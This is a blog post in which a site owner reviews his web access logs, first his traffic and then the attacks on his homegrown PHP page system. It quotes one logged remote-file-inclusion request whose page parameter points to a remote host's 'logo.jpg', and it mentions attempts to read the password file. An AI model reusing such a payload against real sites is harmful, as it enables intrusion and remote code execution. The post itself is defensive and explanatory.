As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.
What's really interesting about my access logs, however — and why I look at them rather than using a web beacon — are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a a typical log entry, that appears to be coming from a home computer:
18.104.22.168 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://22.214.171.124/~calebsbi/logo.jpg? HTTP/1.1"
If my pages blindly took the
page parameter value and passed it to
include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to
include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).
What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the
page parameter: I don't get hits with
sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.
So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.